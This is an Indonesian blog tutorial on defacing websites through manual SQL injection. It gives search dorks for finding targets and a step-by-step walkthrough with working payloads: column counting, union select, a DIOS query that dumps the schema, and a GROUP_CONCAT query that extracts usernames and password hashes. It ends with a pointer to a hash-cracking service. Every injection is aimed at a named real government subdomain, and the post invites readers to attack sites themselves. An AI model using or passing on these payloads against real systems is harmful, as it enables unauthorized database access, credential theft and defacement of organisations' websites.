BLANTERWISDOM101

Tutorial Deface SQL Manual - With DIOS

Saturday, November 24, 2018

SuiteZploit - SQLI atau Sql injection adalah suatu tekhnik hacking yang digunakan
oleh penyerang untuk mendapatkan database dengan menyisipkan perintah - perintah SQL melalui url yang memanfaatkan bug
yang disebabkan kesalahan code.

Bagaimana cara mengetahui web tersebut vuln ?
Dengan cara membuat error url tersebut, dengan menambahkan karakter (') pada ujung id

Contoh : kontol.com/about.php?id=69'
Lanjut ke tutorialnya

Tutorial
Pertama - tama cari target dengan dork dibawah ini , kalian kembangin lagi sendiri.
  • inurl:/detail_berita.php?id=
  • inurl:/umum.php?id=
  • inurl:/games.php?id=
  • inurl:/about.php?id=

Dan saya sudah punya target gaw.kototabang.bmkg.go.id/detail_berita.php?id=29


Selanjutnya kita coba test web vuln atau tidak dengan menggunakan (') , maka jadinya seperti gini

gaw.kototabang.bmkg.go.id/detail_berita.php?id=29'

Error page ya wkwkw , kok ( ' ) berubah jadi %27 ? itu karna sudah di enter maka ( ' ) otomatis berubah %27
Untuk error berbeda-beda

Contoh Vuln SQL Injection
• You have an error in your SQL syntax;
• Warning: mysql_fetch_array()
Lanjut menginjeksi
Sekarang kita mencari beberapa jumlah column database web itu 
dengan menambahlan perintah order+by, jadi
Perintahnya seperti ini

gaw.kototabang.bmkg.go.id/detail_berita.php?id=29'+order+by+1--+-


Lalu ganti angka 1 ke 2 ke 3 sampai ketemu error page lagi
Disini saya menemukan errornya di order+by+8--+-

Berati kita sudah menemukan jumlah column database 7 ( angka sebelum errornya )

Lanjut.
Selanjutnya kita masukan perintah union+select, dan masukan ( - ) sebelum angka id tadi
Perintahnya seperti ini
gaw.kototabang.bmkg.go.id/detail_berita.php?id=-29'+union+select+1,2,3,4,5,6,7--+-
Maka nanti kita akan mendapatkan sebuah angka, disini saya mendapatkan 
angka 2 dan 4


Kedua angka itu sebenarnya sama, terserah kalian mau pilih yang mana


Lanjut selanjutnya masukan dios
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Saya memilih angka 3 , jadi perintahnya seperti ini
gaw.kototabang.bmkg.go.id/detail_berita.php?id=-29%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7--+-



Lanjut mengambil user & pass nya
Disini username dan password saya di table dbuser. Table username , password 
Kita masukin perintah
/*!50000(SELECT+GROUP_CONCAT([username],0x3a,[password]+SEPARATOR+0x3c62723e)+FROM+[dbuser])*/
Yang Saya Tandai [ ] Yang Harus Kalian Ganti

Maka perintahnya adalah
gaw.kototabang.bmkg.go.id/detail_berita.php?id=-29%27+union+select+1,2,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+dbuser)*/,4,5,6,7--+-



Nahhhh , Username dan Password udah muncul berbentuk hash , tinggal kalian hash di hashkiller.co.uk
Oke sekian dulu , jangan lupa share ke temen temen mu , see you ~
Share This :